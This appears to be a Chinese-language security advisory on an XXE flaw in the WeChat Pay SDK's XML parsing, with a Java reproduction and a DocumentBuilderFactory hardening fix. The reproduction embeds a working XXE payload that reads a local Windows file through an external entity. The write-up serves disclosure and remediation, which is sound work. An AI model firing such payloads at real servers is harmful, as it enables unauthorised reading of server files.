7月3日，微信支付爆出存在严重安全漏洞，可能导致商户服务器被入侵。

问题重现

 public static void test() {
        String xmlStr = "<?xml version=\"1.0\" encoding=\"utf-8\"?><!DOCTYPE xdsec[<!ELEMENT methodname ANY><!ENTITY xxe SYSTEM \"file:///c:/windows/win.ini\">]><methodcall><methodname>&xxe;</methodname></methodcall>";
        try {
            System.out.println(xmlStr);
            System.out.println("+++++++++++++++++");
            Map<String, String> hm = WxPayTool.xmlToMap(xmlStr);
            System.out.println("+++++++++++++++++");
            System.out.println(hm);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

xmlToMap方法对应sdk中xmlToMap方法。
运行测试代码，可以发现本地文件被输出。

上面只是问题的简单定位，虽然攻击者不太可能知道微信通知的url,而且实际项目中一般不会将内容直接输出，但是攻击者仍然可以执行其他命名或者通过其他方式获取到服务器上文件或目录，因此应当尽快修复该问题。

修复方案

DocumentBuilderFactory documentBuilderFactory = DocumentBuilderFactory.newInstance();
            documentBuilderFactory.setFeature("http://apache.org/xml/features/disallow-doctype-decl",true);  //防止可能的SSRF
            documentBuilderFactory.setXIncludeAware(false);
            documentBuilderFactory.setExpandEntityReferences(false);
            documentBuilderFactory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
            documentBuilderFactory.setFeature("http://xml.org/sax/features/external-general-entities", false);
            DocumentBuilder documentBuilder = documentBuilderFactory.newDocumentBuilder();
            InputStream stream = new ByteArrayInputStream(xmlString.getBytes("UTF-8"));